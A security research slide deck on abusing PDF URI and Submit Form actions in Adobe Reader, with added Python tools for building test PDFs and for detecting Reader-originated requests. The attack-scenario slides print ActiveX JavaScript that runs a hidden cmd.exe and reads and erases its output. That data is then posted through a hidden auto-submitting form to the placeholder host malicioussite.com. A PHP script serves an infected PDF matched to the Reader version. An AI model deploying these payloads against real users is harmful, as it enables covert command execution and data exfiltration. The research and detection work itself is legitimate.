Malicious URI resolving in PDFs


Malicious URI resolving in PDFs
Valentin HAMON, Operational cryptology and virology laboratory (C+V)
valentin.hamon@et.esiea-ouest.fr
http://cvo-lab.blogspot.fr/

Outline
- Introduction
- Network security in Adobe Reader
  - URI method
  - Submit Form method
  - Adobe URL filter
- Weaknesses of Adobe's URL Security Zone Manager
- Attack scenario 1: an invisible malicious proxy
- Attack scenario 2: scouting Adobe Reader
- Conclusion
- Questions


Introduction (1/3)
PDF format:
- Primarily made up of objects.
- These objects can be dynamic:
  - JavaScript
  - Forms
  - Digital media (SWF, ...)
  - ...

Introduction (2/3)
And we know that dynamic objects => security threats. The classic trigger is /OpenAction, which makes the viewer run an action as soon as the document is opened, with no click from the user.

Introduction (3/3)
Previous work:
- Eric Filiol, Black Hat EU 2008: "PDF security analysis and malware threats".
- Raynal, Delugré and Aumaitre, Hack.lu 2009: "Malicious Origami in PDF".
- Didier Stevens, Hack.lu 2009: "Penetration document format".


Network security in Adobe Reader: URI method (1/5)
RFC 3986 (the wording quoted here is that of its predecessor, RFC 2396): "a Uniform Resource Identifier (URI) is a compact string of characters for identifying an abstract or physical resource". A Uniform Resource Locator (URL) is a URI that identifies a resource "via a representation of [its] primary access mechanism".

Network security in Adobe Reader: URI method (2/5)
PDF Reference 1.7: a URI action causes a URI to be resolved. Many protocols are therefore supported:
- HTTP
- FTP
- MAILTO
- ...

Network security in Adobe Reader: URI method (3/5)
Code (a URI action: /S /URI names the action type, the /URI entry carries the target):

    4 0 obj
    <<
      /Type /Action
      /S /URI
      /URI (http://www.malicioussite.com/upload.php)
    >>
    endobj

Network security in Adobe Reader: URI method (4/5)
How the request is made: Weblink plug-in -> Weblink driver -> IAC (Interapplication Communication) message -> default web browser -> request performed. Adobe Reader does not fetch the URI itself; it hands it to whatever browser is registered as the default.

Network security in Adobe Reader: URI method (5/5)
GET request performed (Internet Explorer 9). [Wireshark capture of the request launched by the URI action]


Network security in Adobe Reader: Submit Form method (1/8)
PDF Reference 1.7: a submit-form action transmits the names and values of selected interactive form fields to a specified uniform resource locator (URL).

Network security in Adobe Reader: Submit Form method (2/8)
Code (the target is a URL file specification: /FS /URL, with the address in /F):

    4 0 obj
    <<
      /Type /Action
      /S /SubmitForm
      /F << /FS /URL /F (http://www.malicioussite.com/upload.php) >>
    >>
    endobj

Network security in Adobe Reader: Submit Form method (3/8)
How the request is made: AcroForms -> request performed -> results viewed in the default web browser. Unlike the URI method, the request itself is issued by Adobe Reader (its AcroForms component); only the response is handed to the browser.

Network security in Adobe Reader: Submit Form method (4/8)
Different file formats can be used to transmit form data from a PDF:
- HTML form format
- Forms Data Format (FDF)
- XFDF, an XML-based version of FDF
- PDF

Network security in Adobe Reader: Submit Form method (5/8)
POST request performed. [Wireshark capture of the request launched by the Submit Form action]

Network security in Adobe Reader: Submit Form method (6/8)
The frame contains an FDF file. [Wireshark capture of the POST body]

Network security in Adobe Reader: Submit Form method (7/8)
Note about JavaScript: the same submission can be triggered from a JavaScript action with Acrobat's submitForm() method:

    4 0 obj
    <<
      /S /JavaScript
      /JS (
        var aSubmitFields = new Array("0");
        this.submitForm({
          cURL: "http://www.malicioussite.com/upload.php",
          aFields: aSubmitFields,
          cSubmitAs: "FDF"
        });
      )
    >>
    endobj

Network security in Adobe Reader: Submit Form method (8/8)
But JavaScript must be enabled in the user's configuration:
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\9.0\JSPrefs => bEnableJS set to 0x00000001
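To make the two actions above concrete, the following Python is an added example (not code from the talk): it builds a minimal PDF whose /OpenAction is either a Submit Form action or a URI action, so the behaviour can be reproduced in a lab against a server you control, and then scans a PDF for such network-triggering actions and their targets. The URL is the slides' placeholder; the object numbers, the field name, the extra action types in the scanner's list and the regex approach are my own choices. The scanner only sees uncompressed objects (it does not inflate /ObjStm object streams or decode hex strings), which is the main caveat for using it as a triage tool.

```python
import re
from typing import Dict, List, Optional

# Placeholder URL taken from the slides; point it at a server you control when testing.
TEST_URL = "http://www.malicioussite.com/upload.php"


def pdf_literal(s: str) -> bytes:
    """Encode a string as a PDF literal string, escaping backslash and parentheses."""
    escaped = s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    return b"(" + escaped.encode("latin-1") + b")"


def build_pdf(url: str, method: str = "SubmitForm") -> bytes:
    """Single-page PDF whose /OpenAction fires a /SubmitForm or /URI action on open.

    Object 4 is the action, object 5 a text field so the Submit Form action has
    something to send (Reader posts field names and values as FDF by default).
    """
    if method == "SubmitForm":
        action = (b"<< /Type /Action /S /SubmitForm /F << /FS /URL /F "
                  + pdf_literal(url) + b" >> >>")
    elif method == "URI":
        action = b"<< /Type /Action /S /URI /URI " + pdf_literal(url) + b" >>"
    else:
        raise ValueError("method must be 'SubmitForm' or 'URI'")
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R /AcroForm << /Fields [5 0 R] >> >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 100] /Annots [5 0 R] >>",
        action,
        b"<< /Type /Annot /Subtype /Widget /FT /Tx /T (field0) /V (x) /Rect [10 10 100 30] /P 3 0 R >>",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))                  # byte offset recorded for the xref table
        out += f"{num} 0 obj\n".encode() + body + b"\nendobj\n"
    xref_pos = len(out)
    out += f"xref\n0 {len(objects) + 1}\n".encode()
    out += b"0000000000 65535 f \n"               # entry 0: head of the free list
    for off in offsets:
        out += f"{off:010d} 00000 n \n".encode()  # fixed 20-byte entries
    out += (f"trailer\n<< /Size {len(objects) + 1} /Root 1 0 R >>\n"
            f"startxref\n{xref_pos}\n%%EOF\n").encode()
    return bytes(out)


def xref_is_consistent(data: bytes) -> bool:
    """Check that every xref entry points at the 'N 0 obj' header it claims."""
    start = int(data[data.rindex(b"startxref") + len(b"startxref"):].split()[0])
    section = data[start:].split(b"\n")
    if section[0] != b"xref":
        return False
    count = int(section[1].split()[1])
    for num in range(1, count):
        offset = int(section[2 + num].split()[0])
        if not data[offset:].startswith(f"{num} 0 obj".encode()):
            return False
    return True


# Action types that make Reader, or the browser it hands off to, touch something external.
ACTION_RE = re.compile(rb"/S\s*/(URI|SubmitForm|Launch|GoToR|ImportData)\b")
OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)\bendobj", re.S)
# Literal string body: backslash escapes or anything but an unescaped ')'.
URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")
F_RE = re.compile(rb"/F\s*\(((?:\\.|[^\\)])*)\)")


def scan_pdf(data: bytes) -> Dict[str, object]:
    """Report whether /OpenAction is present and list external-resolving actions.

    Regex-based, so it only sees uncompressed objects: actions inside /ObjStm
    streams or written as hex strings are missed. A clean result means
    'nothing obvious', not 'safe'.
    """
    actions: List[Dict[str, Optional[str]]] = []
    for obj in OBJ_RE.finditer(data):
        body = obj.group(2)
        match = ACTION_RE.search(body)
        if not match:
            continue
        kind = match.group(1).decode()
        target = (URI_RE if kind == "URI" else F_RE).search(body)
        actions.append({
            "obj": int(obj.group(1)),
            "type": kind,
            "target": target.group(1).decode("latin-1") if target else None,
        })
    return {"open_action": b"/OpenAction" in data, "actions": actions}


if __name__ == "__main__":
    for method in ("SubmitForm", "URI"):
        pdf = build_pdf(TEST_URL, method)
        print(method, "xref ok:", xref_is_consistent(pdf), scan_pdf(pdf))
```

Open the generated file in the reader under test with a sniffer running: the Submit Form variant should produce a POST from the reader process itself, the URI variant a GET from the default browser, which is the difference the following sections build on.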


Network security in Adobe Reader: Adobe URL filter (1/7)
By default, an alert box appears asking the user whether to allow the connection. [screenshot of the Security Warning dialog]

Network security in Adobe Reader: Adobe URL filter (2/7)
To allow every website without prompting:
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\9.0\TrustManager\cDefaultLaunchURLPerms => set the iURLPerms value to 0x00000002

Network security in Adobe Reader: Adobe URL filter (3/7)
There is also a filter on the file type of the response (ONLY for the Submit Form method):
- Accepted: .HTML, .PDF, .FDF, .PHP, .ASP, ... (web and Adobe files)
- Rejected: .exe, .js, .vbs, ...

Network security in Adobe Reader: Adobe URL filter (4/7)
But there is no such filter for the URI method (it is the web browser's job):
- Accepted: ALL (including .exe, .vbs, etc.)
- Rejected: NONE (it may depend on the web browser)

Network security in Adobe Reader: Adobe URL filter (5/7)
Demo: **Opening a PDF can cause the automatic download of a malicious file** => social engineering.
- Web browser 1: Mozilla Firefox
- Web browser 2: Microsoft Internet Explorer
- Web browser 3: Google Chrome

Network security in Adobe Reader: Adobe URL filter (6/7)
Disadvantages:
- Hard to find a method to automatically launch the downloaded file (ActiveX methods in IE could be used).
Advantages:
- Executable-based attacks are well known; PDF-based attacks are less known.
- It works with every version of Adobe Reader.

Network security in Adobe Reader: Adobe URL filter (7/7)
Combining the two:
- Step 1: force the download of a big malicious executable through the URI action.
- Step 2: the big malicious executable is now on the victim's disk.
- Step 3: a JavaScript exploit in the same PDF launches a small shellcode; the shellcode only has to launch the executable already downloaded.


Weaknesses of Adobe's URL Security Zone Manager (1/5)
With the URI method: the security configuration of the zone is correctly applied, because the browser receives the real URL.

Weaknesses of Adobe's URL Security Zone Manager (2/5)
With the Submit Form method: the browser is only given a local file, e.g.
C:\Users\CURRENT_USER\AppData\Local\Temp\AR95F6.htm
The web browser only knows this URI!!!

Weaknesses of Adobe's URL Security Zone Manager (3/5)
**The web browser cannot know the real URL.** **Now imagine a URL that is normally blacklisted in the web browser: if we use Submit Form, the browser's filter cannot be applied to that URL**, since the filter never sees anything but the temporary file path.

Weaknesses of Adobe's URL Security Zone Manager (4/5)
With Adobe Reader X (version 10) and later: Protected Mode.
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\10.0\Privileged\bProtectedMode



An invisible malicious proxy (1/10)
Step 1: opening the PDF launches an HTTP request to the malicious server, using
- /OpenAction
- a /SubmitForm action


An invisible malicious proxy (2/10)
Step 2: AcroForms performs the request; the response file is saved under the user's AppData directory, e.g.
C:\Users\CURRENT_USER\AppData\Local\Temp\AR95F6.htm
and opened in the default web browser.


An invisible malicious proxy (3/10)
Step 3: malicious actions are performed on the victim's computer.
Call a hidden shell (JavaScript in the downloaded .htm, executed by Internet Explorer):
- Create a new WScript.Shell ActiveX object:
    var wshShell = new ActiveXObject('WScript.Shell');
- Use the Run method to launch the shell (window style 0 = hidden, true = wait for it to finish):
    wshShell.Run('cmd.exe /c dir > C:/Temp/Mylog.txt', 0, true);

An invisible malicious proxy (4/10)
Step 3: malicious actions are performed on the victim's computer.
Read the file and store it in a JavaScript variable:
- Create a new Scripting.FileSystemObject ActiveX object:
    var fso = new ActiveXObject('Scripting.FileSystemObject');
- Read the file (mode 1 = ForReading):
    var logFile = fso.OpenTextFile("C:/Temp/Mylog.txt", 1);
    var read = logFile.ReadAll();
    logFile.Close();

An invisible malicious proxy (5/10)
Step 3: malicious actions are performed on the victim's computer.
Erase the file on disk:
- Create a new Scripting.FileSystemObject ActiveX object (or reuse the one above).
- Open the file again in "erase" mode (mode 2 = ForWriting, which truncates it) and close it:
    var emptied = fso.OpenTextFile("C:/Temp/Mylog.txt", 2);
    emptied.Close();

An invisible malicious proxy (6/10)
Step 3: malicious actions are performed on the victim's computer.
Pros and cons of this attack (ActiveX):
Advantages:
- The shell is hidden.
- Results can be sent back to a server.
- No AJAX (Asynchronous JavaScript and XML) requests are needed.
Disadvantages:
- Works only with IE configured as the default web browser.
- Registry keys need to be set to allow ActiveX.

An invisible malicious proxy (7/10)
Step 3: malicious actions are performed on the victim's computer.
NOTE: **This is just an example, but any attack against a web browser can be used, as long as the downloaded file type is accepted by AcroForms.**


An invisible malicious proxy (8/10)
Step 4: send the results back to a web server.
- Create an empty, hidden HTML form:
    <form style="display: none; visibility: hidden" action="http://www.malicioussite.com" method="post" name="form" enctype="multipart/form-data">
      <input type="hidden" name="file" id="file" value="">
    </form>
- Put the data to send into the field:
    document.getElementById("file").value = read;
- Auto-submit the form:
    document.form.submit();


An invisible malicious proxy (9/10)
Step 5: server-side reception in PHP.
- Process the HTTP POST requests received:
    if (count($_POST) > 0) { ... }
- Write the results to a file:
    fopen(); fputs(); fclose();

An invisible malicious proxy (10/10)
Step 5: server-side reception in PHP.
- Auto-redirect to a legitimate website, so the victim only ever sees a normal page:
    <form style="display: none; visibility: hidden" action="http://www.google.com" method="post" name="form" enctype="multipart/form-data">
    </form>
    <script> document.form.submit(); </script>

An invisible malicious proxy (Demo)


Scouting Adobe Reader (1/4)
Request performed: [Wireshark capture of the request; the headers sent by AcroForms include an Acrobat-Version header]

Scouting Adobe Reader (2/4)
Server-side processing in PHP:
- Read the headers:
    $headers = apache_request_headers();
- Look for the Acrobat-Version information in the headers and, for a given version number, serve the matching malicious PDF:
    foreach ($headers as $header => $value) {
        if ($header == "Acrobat-Version") {
            if (preg_match("#^9\.#", $value)) { // Adobe Reader version 9.X
                header('Content-Type: application/pdf');
                header('Content-Disposition: attachment; filename="infectedsimple.pdf"');
                readfile('infectedsimple.pdf');
            }
        }
    }

Scouting Adobe Reader (3/4)
In this scenario we don't need JavaScript to learn the Adobe Reader version!!!
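The scouting step relies on Adobe Reader identifying itself in the request, and the same signal serves the defender: at an egress proxy, an Acrobat-Version header tells you the request was issued by the PDF reader rather than by a browser, which is exactly the traffic the browser's zone manager and URL blacklist (previous section) never get to inspect. The Python below is an added example, not code from the talk: it parses raw HTTP requests and flags Reader-originated requests to hosts outside an allowlist, FDF form-data POSTs to such hosts, and reader versions from before Protected Mode. The `application/vnd.fdf` media type, the allowlist and the sample requests are assumptions and constructed data; only the Acrobat-Version header name and the placeholder host come from the slides.

```python
from typing import Dict, List, Tuple

# Assumed allowlist: hosts your organisation's PDF forms legitimately submit to.
ALLOWED_HOSTS = {"forms.example.com"}
# Reader X (10) introduced Protected Mode; older majors handle the response unsandboxed.
FIRST_PROTECTED_MODE_MAJOR = 10


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, target, lower-cased headers)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    method, target, _http_version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def reader_major(version: str) -> int:
    """'9.4.2' -> 9; a malformed value counts as 0 so it is still flagged."""
    try:
        return int(version.split(".")[0])
    except ValueError:
        return 0


def classify(raw: bytes) -> List[str]:
    """Return alert strings for one request; an empty list means nothing suspicious."""
    method, target, headers = parse_request(raw)
    version = headers.get("acrobat-version")
    if version is None:
        return []                     # not issued by Adobe Reader; out of scope here
    alerts: List[str] = []
    host = headers.get("host", "").split(":")[0].lower()
    if host not in ALLOWED_HOSTS:
        alerts.append(f"Adobe Reader request to non-allowlisted host {host} ({method} {target})")
        # Assumed media type for FDF submissions (the slides show the POST body is FDF).
        if method == "POST" and headers.get("content-type", "").startswith("application/vnd.fdf"):
            alerts.append("FDF form data posted from a PDF to a non-allowlisted host")
    if reader_major(version) < FIRST_PROTECTED_MODE_MAJOR:
        alerts.append(f"Acrobat-Version {version} predates Protected Mode (Reader X)")
    return alerts


# Constructed sample requests, not real captures. Hosts are the slides' placeholders.
SAMPLE_REQUESTS = [
    b"POST /upload.php HTTP/1.1\r\nHost: www.malicioussite.com\r\n"
    b"Acrobat-Version: 9.4\r\nContent-Type: application/vnd.fdf\r\nContent-Length: 0\r\n\r\n",
    b"GET /infectedsimple.pdf HTTP/1.1\r\nHost: www.malicioussite.com\r\nAcrobat-Version: 11.0\r\n\r\n",
    b"POST /submit HTTP/1.1\r\nHost: forms.example.com\r\n"
    b"Acrobat-Version: 11.0\r\nContent-Type: application/vnd.fdf\r\n\r\n",
    b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]


def scan_all(requests: List[bytes]) -> List[List[str]]:
    """Classify a batch of raw requests, preserving order."""
    return [classify(r) for r in requests]


if __name__ == "__main__":
    for raw, alerts in zip(SAMPLE_REQUESTS, scan_all(SAMPLE_REQUESTS)):
        print(raw.split(b"\r\n", 1)[0].decode(), "->", alerts or "ok")
```

The version check is the defender's mirror image of the attacker's PHP: where the server uses the header to pick a payload, the proxy uses it to spot readers that still run the AcroForms request path without Protected Mode. A proxy that strips or rewrites Acrobat-Version on the way out also removes the attacker's fingerprinting signal at no cost to legitimate form submissions.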


Conclusion
- /OpenAction still works.
- Try new methods to anticipate future threats.
- Weak URL detection: Adobe's filter sees the URL but not the browser's blacklist, and the browser sees only a local temporary file.

Future work
- Compare the security of different PDF readers.
- Analyse the security of PDFs on smartphones.
- Explore other operating systems (Linux, Mac OS X).


Thank you for your attention. Any questions?
Valentin HAMON, valentin.hamon@et.esiea-ouest.fr